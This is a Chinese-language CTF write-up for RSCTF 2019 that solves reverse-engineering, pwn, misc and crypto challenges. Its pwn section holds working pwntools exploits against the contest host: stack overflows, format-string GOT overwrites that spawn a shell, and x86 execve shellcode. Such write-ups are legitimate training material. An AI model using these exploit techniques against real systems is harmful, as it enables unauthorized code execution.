【WriteUp】RSCTF 2019 题解

WriteUp

今年的融思杯他咋这么难………原本想着看新生表演的

REVERSE

pyc

Description:

CrackMe

Solution:

看到这题其实心里凉了一截,之前把 python 的逆向工具不知道扔哪了

但是我发现了在线反编译网站!!! –> https://tool.lu/pyc/

还原后的 python 代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import base64

def encode(str):
    s = ''
    for i in str:
        x = ord(i) ^ 32
        x = x + 16
        s += chr(x)
    
    return base64.b64encode(s)

correct = 'KVEkKFRUUVQiJiUmIyglVlNVJShRViQnUSBVViUmU1Y='
flag = ''
flag = raw_input('Input flag:')
if encode(flag) == correct:
    print 'yes'
else:
    print 'no'

然后跟着代码还原就完了

exp如下:

1
2
3
4
5
6
7
8
import base64
correct = 'KVEkKFRUUVQiJiUmIyglVlNVJShRViQnUSBVViUmU1Y='
flag = base64.b64decode(correct)
flag = list(flag)
for i in range(len(flag) - 1, -1, -1):
    flag[i] = chr(ord(flag[i]) - 16)
    flag[i] = chr(ord(flag[i]) ^ 32)
print 'flag{' + ''.join(flag) + '}'

Flag:

1
flag{9a48ddad2656385fce58af47a0ef56cf}

Simple

Description:

CrackMe

Solution:

关键点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
__int64 sub_1400013A0()
{
  int v1; // [rsp+20h] [rbp-48h]
  __int128 v2; // [rsp+28h] [rbp-40h]
  __int128 v3; // [rsp+38h] [rbp-30h]
  char v4; // [rsp+48h] [rbp-20h]

  v4 = 0;
  v2 = xmmword_140006BB0;
  v3 = xmmword_140006BC0;
  sub_1400010D2((__int64)"Please input the number which you like:");
  sub_140001163("%d", &v1);
  if ( v1 == 233333 )
  {
    sub_1400010D2((__int64)"Yes, I like it too!!!\n");
    sub_1400010D2((__int64)"flag{%s}");
  }
  else
  {
    sub_1400010D2((__int64)"OK,but I don't like that number");
  }
  return 0i64;
}

没啥好说的,在这句话对应的代码处下个断点

1
sub_1400010D2((__int64)"flag{%s}");

步进步进就看到 flag 了(这里是IDA)

还有一种做法,就是用 x64dbg 直接搜索字符串(应该要装中文搜索引擎插件),直接出

Flag:

1
flag{9cb18aef59e8f00877229bc75491f175}

WF

Description:

CrackMe

Solution:

这题其实是来送分的,函数关键点如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
__int64 sub_1400030D0()
{
  __int64 v0; // rax
  HANDLE v1; // rbx
  __int64 v2; // rax
  signed __int64 v3; // rax
  __m128i v4; // xmm1
  __int64 v5; // rax
  int v7; // [rsp+40h] [rbp-48h]
  DWORD NumberOfBytesWritten; // [rsp+44h] [rbp-44h]
  __int128 Buffer; // [rsp+48h] [rbp-40h]
  __int128 v10; // [rsp+58h] [rbp-30h]
  char v11; // [rsp+68h] [rbp-20h]

  sub_1400010A5(std::cout, "Please tell me how much is 1 + 1:");
  std::basic_istream<char,std::char_traits<char>>::operator>>(std::cin, &v7);
  if ( v7 != 2 )
  {
    v0 = sub_1400010A5(std::cout, "no no no!!!");
    std::basic_ostream<char,std::char_traits<char>>::operator<<(v0, sub_14000106E);
    exit(0);
  }
  sub_1400010A5(std::cout, "yes,so easy!");
  v1 = CreateFileA("D:\\flag", 0xC0000000, 0, 0i64, 4u, 0x80u, 0i64);
  if ( v1 == (HANDLE)-1i64 )
  {
    v2 = sub_1400010A5(std::cout, &unk_140007DD0);
    std::basic_ostream<char,std::char_traits<char>>::operator<<(v2, sub_14000106E);
  }
  v11 = 0;
  v3 = 0i64;
  v10 = xmmword_140007BC0;
  NumberOfBytesWritten = 0;
  v4 = _mm_load_si128((const __m128i *)&xmmword_140007C10);
  Buffer = xmmword_140007BB0;
  do
  {
    _mm_storeu_si128(
      (__m128i *)((char *)&Buffer + v3),
      _mm_add_epi8(_mm_loadu_si128((const __m128i *)((char *)&Buffer + v3)), v4));
    v3 += 16i64;
  }
  while ( v3 < 32 );
  WriteFile(v1, &Buffer, 0x20u, &NumberOfBytesWritten, 0i64);
  CloseHandle(v1);
  DeleteFileA("D:\\flag");
  v5 = sub_1400010A5(std::cout, "HA,did you get the flag?");
  std::basic_ostream<char,std::char_traits<char>>::operator<<(v5, sub_14000106E);
  system("pause");
  return 0i64;
}

先输入 2

可以看到这里创建了 flag 文件又删除了 flag 文件

直接在删除掉它的上一句话下个断点就能直接看 flag 了(去D盘)

这里我好奇没有 D 盘的童鞋该肿么办

Flag:

1
flag{866c37703f08cc4913e30314a8075467}

Simple2

Description:

CrackMe

Solution:

搜索字符串可见这题被 upx 加壳了,先脱壳

upx -d simple2

之后再扔 IDA 里看,发下关键函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v6; // [rsp+0h] [rbp-70h]
  __int64 v7; // [rsp+8h] [rbp-68h]
  __int64 v8; // [rsp+10h] [rbp-60h]
  __int64 v9; // [rsp+18h] [rbp-58h]
  __int64 v10; // [rsp+20h] [rbp-50h]
  __int64 v11; // [rsp+28h] [rbp-48h]
  __int16 v12; // [rsp+30h] [rbp-40h]
  __int64 v13; // [rsp+40h] [rbp-30h]
  __int64 v14; // [rsp+48h] [rbp-28h]
  __int64 v15; // [rsp+50h] [rbp-20h]
  __int64 v16; // [rsp+58h] [rbp-18h]
  char v17; // [rsp+60h] [rbp-10h]
  int i; // [rsp+6Ch] [rbp-4h]

  v13 = '^.13]/.1';
  v14 = '.^3a^,^1';
  v15 = ',3-42/]`';
  v16 = '.+_1\\-43';
  v17 = 0;
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v9 = 0LL;
  v10 = 0LL;
  v11 = 0LL;
  v12 = 0;
  std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
  std::operator>><char,std::char_traits<char>>((std::istream *)&std::cin);
  for ( i = 0; i <= 31; ++i )
    *((_BYTE *)&v6 + i) -= 5;
  if ( (unsigned int)j_strcmp_ifunc(&v13, &v6) )
  {
    v4 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
    std::ostream::operator<<(v4, std::endl<char,std::char_traits<char>>);
  }
  else
  {
    v3 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);
    std::ostream::operator<<(v3, std::endl<char,std::char_traits<char>>);
  }
  return 0;
}

所以很简单,上面有字符串,下面有加密过程,直接逆着写就好了

不过途中发现\是会被转义的,试了一段时间发现不行,删掉一个\就过去了

这个我是拿 gdb 截取的字符串,在这下了个断点

1
.text:00000000004049FB                 test    eax, eax

之后就剩写脚本了

exp如下:

1
2
3
4
5
str_enc = r"1./]31.^1^,^a3^.`]/24-3,34-\1_+."
str_enc = list(str_enc)
for i in range(0, 32):
    str_enc[i] = chr(ord(str_enc[i]) + 5)
print 'flag{' + ''.join(str_enc) + '}'

Flag:

1
flag{634b863c6c1cf8c3eb479281892a6d03}

Mobile

Description:

CrackMe

Solution:

com.example.myapplication包里看到 flag 有关信息

有用的代码如下

MainActivity

1
2
3
4
5
6
String flag2 = flag.substring(0, flag.length() - 1);
if (Encryption.Encode(flag2, flag2.length()).equals("FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=")) {
    Toast.makeText(MainActivity.this, "Yes,this is your flag!", 0).show();
} else {
    Toast.makeText(MainActivity.this, "NO NO NO!!!!!!!!!!!!!!!", 0).show();
}

Encryption

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
package com.example.myapplication;

public class Encryption {
    public static String Encode(String str, int k) {
        String string = BuildConfig.FLAVOR;
        for (int i = 0; i < str.length(); i++) {
            char c = str.charAt(i);
            if (c >= 'a' && c <= 'z') {
                c = (char) ((k % 26) + c);
                if (c < 'a') {
                    c = (char) (c + 26);
                }
                if (c > 'z') {
                    c = (char) (c - 26);
                }
            } else if (c >= 'A' && c <= 'Z') {
                c = (char) ((k % 26) + c);
                if (c < 'A') {
                    c = (char) (c + 26);
                }
                if (c > 'Z') {
                    c = (char) (c - 26);
                }
            }
            StringBuilder stringBuilder = new StringBuilder();
            stringBuilder.append(string);
            stringBuilder.append(c);
            string = stringBuilder.toString();
        }
        return string;
    }
}

可以发现这东西其实就是一个凯撒加密

我就用原来自己写的凯撒0-127全都遍历一遍的脚本跑了一下,做成新脚本的列表

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import base64
import re

list_enc = ['FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=',
'EUIzE2HqEKZnDaQcQatoEqt4EqMyEdEzEaV5QUPqFXP=',
'DTHyD2GpDJYmCzPbPzsnDps4DpLxDcDyDzU5PTOpEWO=',
'CSGxC2FoCIXlByOaOyrmCor4CoKwCbCxCyT5OSNoDVN=',
'BRFwB2EnBHWkAxNzNxqlBnq4BnJvBaBwBxS5NRMnCUM=',
'AQEvA2DmAGVjZwMyMwpkAmp4AmIuAzAvAwR5MQLmBTL=',
'ZPDuZ2ClZFUiYvLxLvojZlo4ZlHtZyZuZvQ5LPKlASK=',
'YOCtY2BkYEThXuKwKuniYkn4YkGsYxYtYuP5KOJkZRJ=',
'XNBsX2AjXDSgWtJvJtmhXjm4XjFrXwXsXtO5JNIjYQI=',
'WMArW2ZiWCRfVsIuIslgWil4WiEqWvWrWsN5IMHiXPH=',
'VLZqV2YhVBQeUrHtHrkfVhk4VhDpVuVqVrM5HLGhWOG=',
'UKYpU2XgUAPdTqGsGqjeUgj4UgCoUtUpUqL5GKFgVNF=',
'TJXoT2WfTZOcSpFrFpidTfi4TfBnTsToTpK5FJEfUME=',
'SIWnS2VeSYNbRoEqEohcSeh4SeAmSrSnSoJ5EIDeTLD=',
'RHVmR2UdRXMaQnDpDngbRdg4RdZlRqRmRnI5DHCdSKC=',
'QGUlQ2TcQWLzPmCoCmfaQcf4QcYkQpQlQmH5CGBcRJB=',
'PFTkP2SbPVKyOlBnBlezPbe4PbXjPoPkPlG5BFAbQIA=',
'OESjO2RaOUJxNkAmAkdyOad4OaWiOnOjOkF5AEZaPHZ=',
'NDRiN2QzNTIwMjZlZjcxNzc4NzVhNmNiNjE5ZDYzOGY=',
'MCQhM2PyMSHvLiYkYibwMyb4MyUgMlMhMiD5YCXyNFX=',
'LBPgL2OxLRGuKhXjXhavLxa4LxTfLkLgLhC5XBWxMEW=',
'KAOfK2NwKQFtJgWiWgzuKwz4KwSeKjKfKgB5WAVwLDV=',
'JZNeJ2MvJPEsIfVhVfytJvy4JvRdJiJeJfA5VZUvKCU=',
'IYMdI2LuIODrHeUgUexsIux4IuQcIhIdIeZ5UYTuJBT=',
'HXLcH2KtHNCqGdTfTdwrHtw4HtPbHgHcHdY5TXStIAS=',
'GWKbG2JsGMBpFcSeScvqGsv4GsOaGfGbGcX5SWRsHZR=',
'FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=',
'GWKbG2JsGMBpFcSeScvqGsv4GsOaGfGbGcX5SWRsHZR=',
'HXLcH2KtHNCqGdTfTdwrHtw4HtPbHgHcHdY5TXStIAS=',
'IYMdI2LuIODrHeUgUexsIux4IuQcIhIdIeZ5UYTuJBT=',
'JZNeJ2MvJPEsIfVhVfytJvy4JvRdJiJeJfA5VZUvKCU=',
'KAOfK2NwKQFtJgWiWgzuKwz4KwSeKjKfKgB5WAVwLDV=',
'LBPgL2OxLRGuKhXjXhavLxa4LxTfLkLgLhC5XBWxMEW=',
'MCQhM2PyMSHvLiYkYibwMyb4MyUgMlMhMiD5YCXyNFX=',
'NDRiN2QzNTIwMjZlZjcxNzc4NzVhNmNiNjE5ZDYzOGY=',
'OESjO2RaOUJxNkAmAkdyOad4OaWiOnOjOkF5AEZaPHZ=',
'PFTkP2SbPVKyOlBnBlezPbe4PbXjPoPkPlG5BFAbQIA=',
'QGUlQ2TcQWLzPmCoCmfaQcf4QcYkQpQlQmH5CGBcRJB=',
'RHVmR2UdRXMaQnDpDngbRdg4RdZlRqRmRnI5DHCdSKC=',
'SIWnS2VeSYNbRoEqEohcSeh4SeAmSrSnSoJ5EIDeTLD=',
'TJXoT2WfTZOcSpFrFpidTfi4TfBnTsToTpK5FJEfUME=',
'UKYpU2XgUAPdTqGsGqjeUgj4UgCoUtUpUqL5GKFgVNF=',
'VLZqV2YhVBQeUrHtHrkfVhk4VhDpVuVqVrM5HLGhWOG=',
'WMArW2ZiWCRfVsIuIslgWil4WiEqWvWrWsN5IMHiXPH=',
'XNBsX2AjXDSgWtJvJtmhXjm4XjFrXwXsXtO5JNIjYQI=',
'YOCtY2BkYEThXuKwKuniYkn4YkGsYxYtYuP5KOJkZRJ=',
'ZPDuZ2ClZFUiYvLxLvojZlo4ZlHtZyZuZvQ5LPKlASK=',
'AQEvA2DmAGVjZwMyMwpkAmp4AmIuAzAvAwR5MQLmBTL=',
'BRFwB2EnBHWkAxNzNxqlBnq4BnJvBaBwBxS5NRMnCUM=',
'CSGxC2FoCIXlByOaOyrmCor4CoKwCbCxCyT5OSNoDVN=',
'DTHyD2GpDJYmCzPbPzsnDps4DpLxDcDyDzU5PTOpEWO=',
'EUIzE2HqEKZnDaQcQatoEqt4EqMyEdEzEaV5QUPqFXP=',
'FVJaF2IrFLAoEbRdRbupFru4FrNzFeFaFbW5RVQrGYQ=']

for i in range(0, len(list_enc)):
    try:
        res = base64.b64decode(list_enc[i])
        if not re.search('[^a-zA-Z0-9]', res):
            print 'flag{' + res + '}'
    except:
        print '[-]There is something wrong'

Flag:

1
flag{44b7d352026ef7177875a6cb619d638f}

gogogo

Description:

CrackMe

Solution:

正常的入门逆向题,要改两次标志位,这题最秀的是出题人一开始放错文件了……

首先就是找到main_main函数,因为是 go 语言

函数如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
__int64 __usercall main_main@<rax>(__int64 a1@<rbp>, __int64 a2@<rdi>, __int64 a3@<rsi>)
{
  __int64 v3; // rdx
  __int64 result; // rax
  __int64 v5; // rdx
  __int64 v6; // rdx
  __int64 v7; // r8
  __int64 v8; // r9
  _QWORD *v9; // [rsp+8h] [rbp-98h]
  __int128 v10; // [rsp+58h] [rbp-48h]
  __int128 v11; // [rsp+68h] [rbp-38h]
  __int128 v12; // [rsp+78h] [rbp-28h]
  __int128 v13; // [rsp+88h] [rbp-18h]
  __int64 v14; // [rsp+98h] [rbp-8h]

  if ( (unsigned __int64)&v12 + 8 <= *(_QWORD *)(*(_QWORD *)__readgsqword(0x28u) + 16LL) )
    runtime_morestack_noctxt(a2, a3);
  runtime_newobject(a2, a3);
  *(_QWORD *)&v13 = &unk_4B2640;
  *((_QWORD *)&v13 + 1) = &main_statictmp_0;
  fmt_Fprint(a2, a3, &v13, &unk_4B2640);
  *(_QWORD *)&v12 = &unk_4AF540;
  *((_QWORD *)&v12 + 1) = v9;
  fmt_Fscanf(a2, a3, &go_itab__os_File_io_Reader);
  if ( v9[1] == 11LL )
  {
    runtime_memequal(a2, a3, v3, *v9);
    runtime_convTstring(a2, a3, v5);
    *(_QWORD *)&v11 = &unk_4B2640;
    *((_QWORD *)&v11 + 1) = 11LL;
    result = fmt_Fprintf(
               a2,
               a3,
               v6,
               (__int64)&go_itab__os_File_io_Writer,
               v7,
               v8,
               (__int64)&go_itab__os_File_io_Writer,
               os_Stdout,
               (__int64)"yse ,flag{%s}}\n\tsched={pc: but progSize  nmidlelocked= on zero Value out of range  procedure in  t.npagesKey=  to finalizer  untyped args -thread limit\n1907348632812595367431640625CertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRegSetValueExWSetFilePointerTranslateNameWallocfreetracebad allocCountbad span statebad stack sizefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a directorylevel 2 haltedlevel 3 haltednil elem type!no module datano such deviceprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreachable:  unsafe.Pointerwinapi error #work.full != 0  with GC prog\n476837158203125<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDuplicateHandleFailed to find Failed to load FlushViewOfFileGetAdaptersInfoGetCommandLineWGetProcessTimesGetStartupInfoWImpersonateSelfOpenThreadTokenOther_LowercaseOther_UppercaseProcess32FirstWPsalter_PahlaviRegCreateKeyExWRegDeleteValueWUnmapViewOfFile]\n\tmorebuf={pc:advertise errorbad debugCallV1force gc (idle)key has expiredmalloc deadlockmissing mcache?ms: gomaxprocs=network is downno medium foundno such processrecovery failedruntime error: runtime: frame scan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges:\n untyped locals , not a function0123456789abcdef2384185791015625: value of type AddDllDirectory",
               13LL,
               (__int64)&v11,
               1LL,
               1LL);
  }
  else
  {
    *(_QWORD *)&v10 = &unk_4B2640;
    *((_QWORD *)&v10 + 1) = &main_statictmp_1;
    result = fmt_Fprintln((__int64)&v14, a2, a3, (__int64)&go_itab__os_File_io_Writer, os_Stdout);
  }
  return result;
}

可以看到 if 语句有两次判断,所以改两次 z 标志位就完了

Flag:

1
flag{34d1f91fb2e514b8576fab1a75a89a6b}

PWN

veryeasypwn

Description:

Solution:

送分 pwn,应该是鼓励大家出的,只要输入 233 就行

讲真这次比赛的 pwn 出的真的太入门了,有逆向的一点难度就好了,甚至见不到 ret2libc

Flag:

1
动态靶机

pwn-1

Description:

Solution:

正常的入门 pwn,也就是 ret2text

gets函数栈溢出直接覆盖返回地址为0x4005B6即可

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="amd64", os="linux")
if debug == 1:
    p = process('./pwn3')
elif debug == 0:
    p = remote('117.139.247.14', 9636)

pd = 'a' * 0x28
pd += p64(0x00000000004005B6)
p.sendline(pd)
p.interactive()

Flag:

1
动态靶机

pwn-2

Description:

Solution:

学习路上还没有怎么看格式化字符串,因为很多比赛都没有出过,实际应用也很少

结果他就出了,一出还出两个!

这是第四个 pwn 题,我根据最后的显示排的序……

这题比较新颖,应该说很少有人出吧,漏洞点是格式化字符串漏洞

技术是劫持 __stack_chk_fail 的 got 地址,直接改成后门地址就完了

这题出的是真好,又有 canary,还不能用fmtstr_payload 函数,因为长度会超

打个融思杯,从零开始学格式化字符串系列……

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./pwn4')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9217)
    # libc = ELF('./', checksec=False)
elf = ELF('./pwn4', checksec=False)
# gdb.attach(p, "b *0x0804857E\nc\nsi")
# gdb.attach(p, "b *0x080485A6\nc")
got___stack_chk_fail = elf.got['__stack_chk_fail']
addr_fun_sys = 0x080484FB

pd = 'aa'  # 4 num = 2
pd += p32(got___stack_chk_fail + 0)  # 5 num = 6
pd += p32(got___stack_chk_fail + 1)  # 6 num = 10
pd += '%' + str(0xfb - 10) + 'd%5$hhn' # num = 19
pd += '%' + str(0x89) + 'd%6$hhn'
print pd
success('got___stack_chk_fail = ' + hex(got___stack_chk_fail))
p.send(pd)
p.interactive()

Flag:

1
动态靶机

Entry level pwn

Description:

Solution:

这题比较简单,拿 pwntools 里面的fmtstr_payload 函数直接怼就行

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./format')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9309)
elf = ELF('./format', checksec=False)
# gdb.attach(p, "b *0x08048589\nc\nsi")
got_printf = elf.got['printf']

p.recvuntil('TERM environment variable not set.\n')
# 这块用got_printf和got_setbuf测出libc版本
# addr_printf后三位为0x020,addr_setbuf后三位为0x450
# 得到的libc为libc6-i386_2.23-0ubuntu10_amd64
pd = p32(elf.got['printf']) + "%7$s"
p.sendline(pd)
p.recv(4)
addr_printf = u32(p.recv(4))
libcbase = addr_printf - 0x049020
addr_system = libcbase + 0x03a940
pd = fmtstr_payload(7, {got_printf: addr_system})
p.sendline(pd)
success('addr_printf = ' + hex(addr_printf))
success('addr_system = ' + hex(addr_system))
p.sendline("/bin/sh\x00")
p.interactive()

Flag:

1
动态靶机

pwn-3

Description:

hint:花式栈溢出

Solution:

甚至放出了 hint……

这题主要是不能靠 ret2libc 来做,后面有个靠 eax 传参的地方会卡死,所以还是老老实实 shellcode

shellcode 注入很简单,这道题就是多考了一点,也就是更改栈的高度

既然是关闭了 NX 保护,所以你想咋改就咋改,直接用asm()函数怼就完了

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./pwn5')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9337)
    # libc = ELF('./', checksec=False)
elf = ELF('./pwn5', checksec=False)

# gdb.attach(p, "b *0x08048550\nc")
shellcode_x86 = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

pd = shellcode_x86
pd = pd.ljust(0x24, '\x00')
pd += p32(0x08048554)
pd += asm("sub esp,0x28;jmp esp;")
p.sendlineafter('>\n', pd)
p.interactive()

Flag:

1
动态靶机

pwn-4

Description:

hint:溢出,溢出

Solution:

被各大平台出烂的题,攻防世界 和 CGCTF 我记得都有,原题名就是when_did_you_born

比较暴力的一道题,直接搬脚本懒得自己写了

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

p = remote('117.139.247.14', 9514)
# p = process('./when_did_you_born')

pd = 'a' * 8
pd += p64(1926)

p.sendline('1')
p.sendline(pd)
p.recvuntil('Have Flag.\n')
p.interactive()

Flag:

1
动态靶机

MISC

Description:

flag提交格式为:flag{xxxx} xxxx即为所得字符串

Solution:

notepad++ 打开,拉到最后一行,复制粘贴摩斯电码解密即可

注意是小写

Flag:

1
flag{didi_didi_da!}

佩奇!

Description:

了解一下什么是LSB吧~

Solution:

这题我想暴打出题人,试了一万种方法都不行,想到了我存在角落的py2-linux-cloacked-pixel脚本

项目源码:https://github.com/livz/cloacked-pixel

而且密码是 123456,这谁想得出来,我搜了一堆题解偶然看到有这个密码的,侥幸试了试,过了

之后是一张二维码,用 ps 去掉黑边就能扫出 flag 了

Flag:

1
flag{zhang_sheng_song_gei_she_hui_ren_!}

饿了么

Description:

Solution:

拿到题后发现是张图片,用 foremost 尝试分离后发现多了一个 zip 文件

尝试后发现不是伪加密,所以扔到网站上解密,发现密码是password

然后可以看到乱七八糟的一个 txt 文件

我们去在线网站做字频分析即可,最后即可得到 flag

Flag:

1
flag{HibAse6432kFc}

beautiful girl

Description:

Solution:

下载下来我们发现是一张图,用 winhex 查看发现有两个 png 文件头

删掉前面的 png 文件后发现后面依旧不能变成 png,这时候看了看文件尾发现是一个zip50 4B 01 02

所以就把第二个 png 文件头的地方改成 zip 的文件头,解压发现一张down.png图片

尝试改高度发现底下提醒这里没有 flag

最后扔在线网站直接解密了,不过这里我发现需要将高度完美还原才行,暂且不知道办法

我是手里有一个判断 png 文件宽度和高度逆算 CRC 对不对的工具,然后手改的高度,最后改为了0x258

Flag:

1
flag{steganography_is_interesting_!}

CRYPTO

国学

Description:

玄学才是经典
题目:兑巽艮震震乾艮乾坎巽坤震艮艮艮震坎艮坎震震艮坎坤坎坤乾震坎离艮离坎震坤震离离坤兑坎震坤震兑艮艮坤坎坎坤震兑乾离乾坎坤坎

Solution:

给我一万个脑子才能做出来的东西,我服了,脑洞题真的秀

解密第一步,了解八卦数

1
2
3
4
5
八卦之数:

先天八卦数:乾(1)、兑(2)、离(3)、震(4)、巽(5)、坎(6)、艮(7)、坤(8)

后天八卦数:乾(6)、坎(1)、艮(8)、震(3)、巽(4)、离(9)、坤(2)、兑(7)

然后写脚本,换了 n 个脚本才写出来,这题拿一二三血的脑洞也太大了吧

就第一步所有数都减 1 我就卡了好久

exp如下:

1
2
3
4
5
6
7
8
9
10
import binascii

int_dec = '25744171658477746764476868146373648433826484277866842131686'
int_dec = list(int_dec)
for i in range(0, len(int_dec)):
    int_dec[i] = str(int(int_dec[i]) - 1)
int_oct = int(''.join(int_dec))
int_dec = int(str(int_oct), 8)
int_hex = hex(int_dec)
print binascii.a2b_hex(int_hex[2:-1]).decode("utf-8")

Flag:

1
flag{guo_xue_is_good!}

XOR

Description:

Solution:

不知道被各平台出了多少遍的题,直接找前两个字符的异或写脚本

exp如下:

1
2
3
4
5
6
7
8
import base64
cipher = "JiwhJzshc3lyeXZwdHJxeXFzcXZ1cXl3eHR1JnN0IiZ1JHEheD0="
cipher = base64.b64decode(cipher)
flag = ""

for i in range(len(cipher)):
    flag += chr(64 ^ ord(cipher[i]))
print flag

Flag:

1
flag{a392960421913165197845f34bf5d1a8}

Ez RSA

Description:

启动题目后会出现ip及端口 如: 127.0.0.1:8080 可使用nc 127.0.0.1 8080 连接题目

Solution:

这题妙啊,还有隐含的假 flag,不过是 RSA 的基础题

连上 nc 后出现这些东东

1
2
3
4
5
6
7
8
9
10
11
hhhhhhhhhhhhhhhhhhhhhhhh  this is easy hhhhhhhhhhhhhhhhhhhhhhhhhhhh


N = 0x25a1b1e3108a3d2e3a962f16765e13defc71456c3804a582318de1453L

e = 5

c = 0x1c073214016413df344d16894c48103c8b92fca17f2edb3a19f4d23c6

#######################################################
Please give me long_to_bytes(m).encode('hex')=

直接去factordb.com分解,得到 q, p 的值

然后写脚本就行了

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import gmpy2
import binascii
from Crypto.Util import *

p = gmpy2.mpz(23802298000094034769309134046892260326665858038920881101172459)
q = gmpy2.mpz(2663993)
n = gmpy2.mpz(63409155256164507967196147936982653264415559154678954807355722568787)
e = gmpy2.mpz(5)
phi_n = (p - 1) * (q - 1)
d = gmpy2.mpz(gmpy2.invert(e, phi_n))  # 求逆元
c = gmpy2.mpz(47227268354772263297672801857404286345600006178682788542814788330438)
m = pow(c, d, n)
print number.long_to_bytes(m).encode('hex')
print 'This is fake flag --> ' + binascii.a2b_hex(hex(m)[2:]).decode("utf8")

之后复制粘贴第一个 print 出的内容到终端就能得到 flag

Flag:

1
动态靶机

Alice is loney

Description:

启动题目后会出现ip及端口 如: 127.0.0.1:8080 可使用nc 127.0.0.1 8080 连接题目

Solution:

连上去以后显示如下内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
================HELLO-Ctfer================

I write some code here
#######################################################

from Crypto.Util.number import bytes_to_long

from flag import flag

m = bytes_to_long(flag)

n = 164888441809128804043925323634271956117746447290247557983550180397219601638632167520893244184248651325836885440262466991644967448074324222935200774858221524309942099541654472034185281067340449292547001584952112657559833907602079378034244708596313856132553777564957631968285353555564224702946380512343248672289

e = 2

c = pow(m,e,n)

print c

#output :499707694085937832478791464262001401287172806732772794560051316967321235368715727466292805495910281773610881330183697022117438765554611594403081

#######################################################
Please give me long_to_bytes(m).encode('hex')=

分解 n 的时候发现它无法被分解,所以我们采用小明文攻击,以下是攻击脚本

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import gmpy2
import binascii
from Crypto.Util import *

n = gmpy2.mpz(164888441809128804043925323634271956117746447290247557983550180397219601638632167520893244184248651325836885440262466991644967448074324222935200774858221524309942099541654472034185281067340449292547001584952112657559833907602079378034244708596313856132553777564957631968285353555564224702946380512343248672289)
e = gmpy2.mpz(2)
c = gmpy2.mpz(499707694085937832478791464262001401287172806732772794560051316967321235368715727466292805495910281773610881330183697022117438765554611594403081)

i = 0
while 1:
    res = gmpy2.iroot(c + i * n, e)
    if res[1]:
        print '[\033[0;32m+\033[0m]res           = ' + str(res)
        m = gmpy2.mpz(int(res[0]))
        print '[\033[0;32m+\033[0m]ASCII         = ' + binascii.a2b_hex(hex(m)[2:]).decode("utf8")
        print '[\033[0;32m+\033[0m]long_to_bytes = ' + number.long_to_bytes(m).encode('hex')
        break
    print '[\033[0;31m-\033[0m] i = ' + str(i)
    i = i + 1

输入long_to_bytes后输出的字符串即可

Flag:

1
动态靶机

WEB

bestlanguage

Description:

